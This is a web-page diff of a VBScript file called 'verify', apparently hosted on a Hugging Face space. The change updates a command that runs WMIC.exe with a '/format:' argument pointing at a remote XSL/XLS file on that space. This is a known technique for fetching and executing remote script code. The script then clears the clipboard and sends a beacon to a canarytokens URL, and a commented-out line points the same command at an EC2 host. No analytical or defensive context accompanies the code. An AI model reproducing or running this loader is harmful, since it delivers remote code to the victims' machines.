Update verify
Browse files
verify
CHANGED
|
@@ -54,7 +54,7 @@
|
|
| 54 |
|
| 55 |
Set objShell = CreateObject("WScript.Shell")
|
| 56 |
//objShell.Run "cmd /c echo os get /format:""http://ec2-3-17-131-32.us-east-2.compute.amazonaws.com/WMI.xsl"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
|
| 57 |
-
objShell.Run "cmd /c echo os get /format:""https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/WMI.
|
| 58 |
ClearClipboard
|
| 59 |
|
| 60 |
objShell.Run "timeout /T 2 /nobreak", 0, True
|
|
@@ -77,7 +77,7 @@
|
|
| 77 |
Sub SendCanaryToken
|
| 78 |
Dim xhr
|
| 79 |
Set xhr = CreateObject("MSXML2.XMLHTTP")
|
| 80 |
-
xhr.open "GET", "http://canarytokens.com/articles/static/about/
|
| 81 |
xhr.send
|
| 82 |
End Sub
|
| 83 |
|
|
|
|
| 54 |
|
| 55 |
Set objShell = CreateObject("WScript.Shell")
|
| 56 |
//objShell.Run "cmd /c echo os get /format:""http://ec2-3-17-131-32.us-east-2.compute.amazonaws.com/WMI.xsl"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
|
| 57 |
+
objShell.Run "cmd /c echo os get /format:""https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/WMI.xls"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
|
| 58 |
ClearClipboard
|
| 59 |
|
| 60 |
objShell.Run "timeout /T 2 /nobreak", 0, True
|
|
|
|
| 77 |
Sub SendCanaryToken
|
| 78 |
Dim xhr
|
| 79 |
Set xhr = CreateObject("MSXML2.XMLHTTP")
|
| 80 |
+
xhr.open "GET", "http://canarytokens.com/articles/static/about/00/contact.php", False
|
| 81 |
xhr.send
|
| 82 |
End Sub
|
| 83 |
|